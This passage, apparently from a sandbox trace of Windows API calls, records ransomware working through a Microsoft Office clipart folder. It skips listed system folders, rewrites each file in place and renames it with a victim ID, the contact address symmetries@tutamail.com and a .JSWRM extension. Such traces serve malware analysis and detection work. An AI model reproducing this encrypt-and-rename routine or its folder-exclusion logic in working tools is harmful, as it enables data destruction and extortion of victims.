hFile=0x314, lpBuffer=0x24d210*, nNumberOfBytesToWrite=0xb750, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesWritten=0x345e898*=0xb750, lpOverlapped=0x0) returned 1 [0079.489] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24d210 | out: hHeap=0x1e0000) returned 1 [0079.490] CloseHandle (hObject=0x314) returned 1 [0079.490] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2104e8 [0079.490] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0079.490] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0079.490] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d0a0, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0079.490] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0079.490] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0079.490] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0079.490] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a300 [0079.490] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a300, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0079.490] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a300 | out: hHeap=0x1e0000) returned 1 [0079.490] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d7d0 [0079.490] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x2472c8 [0079.490] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d7d0 | out: hHeap=0x1e0000) returned 1 [0079.490] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0079.491] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0090087.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0090087.wmf"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0090087.WMF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0090087.wmf.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0079.491] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2472c8 | out: hHeap=0x1e0000) returned 1 [0079.491] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2104e8 | out: hHeap=0x1e0000) returned 1 [0079.491] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210dd0 | out: hHeap=0x1e0000) returned 1 [0079.491] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xe05b6d7, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xe05b6d7, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xe05b6d7, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x3d90, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="J0090089.WMF", cAlternateFileName="")) returned 1 [0079.491] lstrcmpiW (lpString1="J0090089.WMF", lpString2=".") returned 1 [0079.491] lstrcmpiW (lpString1="J0090089.WMF", lpString2="..") returned 1 [0079.491] lstrcmpiW (lpString1="J0090089.WMF", lpString2="...") returned 1 [0079.491] lstrcmpiW (lpString1="J0090089.WMF", lpString2="windows") returned -1 [0079.491] lstrcmpiW (lpString1="J0090089.WMF", lpString2="recovery") returned -1 [0079.491] lstrcmpiW (lpString1="J0090089.WMF", lpString2="perflogs") returned -1 [0079.491] lstrcmpiW (lpString1="J0090089.WMF", lpString2="documents and settings") returned 1 [0079.491] lstrcmpiW (lpString1="J0090089.WMF", lpString2="$RECYCLE.BIN") returned 1 [0079.491] lstrcmpiW (lpString1="J0090089.WMF", lpString2="system volume information") returned -1 [0079.491] lstrcmpiW (lpString1="J0090089.WMF", lpString2="msocache") returned -1 [0079.491] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2413a8 [0079.491] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0090089.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0079.492] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0090089.WMF", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0090089.WMF", lpUsedDefaultChar=0x0) returned 12 [0079.492] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2413a8 | out: hHeap=0x1e0000) returned 1 [0079.492] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240f20 [0079.492] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0090089.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0079.492] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0090089.WMF", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0090089.WMF", lpUsedDefaultChar=0x0) returned 12 [0079.492] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240f20 | out: hHeap=0x1e0000) returned 1 [0079.492] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210ca0 [0079.492] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2109a8 | out: hHeap=0x1e0000) returned 1 [0079.492] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0079.492] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0079.492] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210288 [0079.492] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0090089.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0090089.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0079.492] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=15760) returned 1 [0079.492] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0079.492] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x3d90) returned 0x24d210 [0079.493] ReadFile (in: hFile=0x314, lpBuffer=0x24d210, nNumberOfBytesToRead=0x3d90, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesRead=0x345e89c*=0x3d90, lpOverlapped=0x0) returned 1 [0079.497] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0079.497] WriteFile (in: hFile=0x314, lpBuffer=0x24d210*, nNumberOfBytesToWrite=0x3d90, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesWritten=0x345e898*=0x3d90, lpOverlapped=0x0) returned 1 [0079.497] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24d210 | out: hHeap=0x1e0000) returned 1 [0079.497] CloseHandle (hObject=0x314) returned 1 [0079.497] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x20ff90 [0079.497] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0079.497] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0079.497] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22cdc8, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0079.497] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0079.497] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0079.497] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0079.497] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a1f8 [0079.497] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a1f8, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0079.497] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a1f8 | out: hHeap=0x1e0000) returned 1 [0079.497] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d920 [0079.497] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x2473c0 [0079.497] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d920 | out: hHeap=0x1e0000) returned 1 [0079.497] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0079.498] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0090089.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0090089.wmf"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0090089.WMF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0090089.wmf.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0079.498] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2473c0 | out: hHeap=0x1e0000) returned 1 [0079.498] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20ff90 | out: hHeap=0x1e0000) returned 1 [0079.498] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210288 | out: hHeap=0x1e0000) returned 1 [0079.498] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xe03547c, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xe03547c, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xe05b6d7, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x6e34, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="J0090149.WMF", cAlternateFileName="")) returned 1 [0079.498] lstrcmpiW (lpString1="J0090149.WMF", lpString2=".") returned 1 [0079.498] lstrcmpiW (lpString1="J0090149.WMF", lpString2="..") returned 1 [0079.498] lstrcmpiW (lpString1="J0090149.WMF", lpString2="...") returned 1 [0079.498] lstrcmpiW (lpString1="J0090149.WMF", lpString2="windows") returned -1 [0079.498] lstrcmpiW (lpString1="J0090149.WMF", lpString2="recovery") returned -1 [0079.498] lstrcmpiW (lpString1="J0090149.WMF", lpString2="perflogs") returned -1 [0079.498] lstrcmpiW (lpString1="J0090149.WMF", lpString2="documents and settings") returned 1 [0079.498] lstrcmpiW (lpString1="J0090149.WMF", lpString2="$RECYCLE.BIN") returned 1 [0079.499] lstrcmpiW (lpString1="J0090149.WMF", lpString2="system volume information") returned -1 [0079.499] lstrcmpiW (lpString1="J0090149.WMF", lpString2="msocache") returned -1 [0079.499] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241308 [0079.499] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0090149.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0079.499] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0090149.WMF", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0090149.WMF", lpUsedDefaultChar=0x0) returned 12 [0079.499] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241308 | out: hHeap=0x1e0000) returned 1 [0079.499] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241268 [0079.499] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0090149.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0079.499] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0090149.WMF", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0090149.WMF", lpUsedDefaultChar=0x0) returned 12 [0079.499] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241268 | out: hHeap=0x1e0000) returned 1 [0079.499] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210618 [0079.499] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210ca0 | out: hHeap=0x1e0000) returned 1 [0079.499] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0079.499] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0079.499] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2109a8 [0079.499] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0090149.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0090149.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0079.499] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=28212) returned 1 [0079.499] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0079.499] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x6e30) returned 0x24d210 [0079.499] ReadFile (in: hFile=0x314, lpBuffer=0x24d210, nNumberOfBytesToRead=0x6e30, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesRead=0x345e89c*=0x6e30, lpOverlapped=0x0) returned 1 [0079.506] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0079.506] WriteFile (in: hFile=0x314, lpBuffer=0x24d210*, nNumberOfBytesToWrite=0x6e30, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesWritten=0x345e898*=0x6e30, lpOverlapped=0x0) returned 1 [0079.506] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24d210 | out: hHeap=0x1e0000) returned 1 [0079.507] CloseHandle (hObject=0x314) returned 1 [0079.507] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210c08 [0079.507] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0079.507] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22ce70 [0079.507] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22ce70, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0079.507] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0079.507] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22ce70 | out: hHeap=0x1e0000) returned 1 [0079.507] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0079.507] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a1c8 [0079.507] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a1c8, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0079.507] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a1c8 | out: hHeap=0x1e0000) returned 1 [0079.507] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d920 [0079.507] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x247f60 [0079.507] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d920 | out: hHeap=0x1e0000) returned 1 [0079.507] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0079.507] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0090149.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0090149.wmf"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0090149.WMF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0090149.wmf.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0079.508] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x247f60 | out: hHeap=0x1e0000) returned 1 [0079.508] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210c08 | out: hHeap=0x1e0000) returned 1 [0079.508] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2109a8 | out: hHeap=0x1e0000) returned 1 [0079.508] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xe03547c, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xe03547c, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xe05b6d7, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x44e6, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="J0090390.WMF", cAlternateFileName="")) returned 1 [0079.508] lstrcmpiW (lpString1="J0090390.WMF", lpString2=".") returned 1 [0079.508] lstrcmpiW (lpString1="J0090390.WMF", lpString2="..") returned 1 [0079.508] lstrcmpiW (lpString1="J0090390.WMF", lpString2="...") returned 1 [0079.508] lstrcmpiW (lpString1="J0090390.WMF", lpString2="windows") returned -1 [0079.508] lstrcmpiW (lpString1="J0090390.WMF", lpString2="recovery") returned -1 [0079.508] lstrcmpiW (lpString1="J0090390.WMF", lpString2="perflogs") returned -1 [0079.508] lstrcmpiW (lpString1="J0090390.WMF", lpString2="documents and settings") returned 1 [0079.508] lstrcmpiW (lpString1="J0090390.WMF", lpString2="$RECYCLE.BIN") returned 1 [0079.508] lstrcmpiW (lpString1="J0090390.WMF", lpString2="system volume information") returned -1 [0079.508] lstrcmpiW (lpString1="J0090390.WMF", lpString2="msocache") returned -1 [0079.508] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2410d8 [0079.508] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0090390.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0079.508] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0090390.WMF", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0090390.WMF", lpUsedDefaultChar=0x0) returned 12 [0079.508] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2410d8 | out: hHeap=0x1e0000) returned 1 [0079.508] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2410d8 [0079.508] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0090390.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0079.508] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0090390.WMF", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0090390.WMF", lpUsedDefaultChar=0x0) returned 12 [0079.508] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2410d8 | out: hHeap=0x1e0000) returned 1 [0079.508] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2100c0 [0079.508] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210618 | out: hHeap=0x1e0000) returned 1 [0079.509] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0079.509] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0079.509] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210ca0 [0079.509] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0090390.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0090390.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0079.509] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=17638) returned 1 [0079.509] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0079.509] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x44e0) returned 0x24d210 [0079.510] ReadFile (in: hFile=0x314, lpBuffer=0x24d210, nNumberOfBytesToRead=0x44e0, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesRead=0x345e89c*=0x44e0, lpOverlapped=0x0) returned 1 [0079.514] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0079.514] WriteFile (in: hFile=0x314, lpBuffer=0x24d210*, nNumberOfBytesToWrite=0x44e0, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesWritten=0x345e898*=0x44e0, lpOverlapped=0x0) returned 1 [0079.515] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24d210 | out: hHeap=0x1e0000) returned 1 [0079.515] CloseHandle (hObject=0x314) returned 1 [0079.515] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x20ff90 [0079.515] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0079.515] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0079.515] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22cdc8, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0079.515] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0079.515] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0079.515] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0079.515] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a1f8 [0079.515] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a1f8, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0079.515] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a1f8 | out: hHeap=0x1e0000) returned 1 [0079.515] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d920 [0079.515] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x247c78 [0079.515] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d920 | out: hHeap=0x1e0000) returned 1 [0079.515] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, 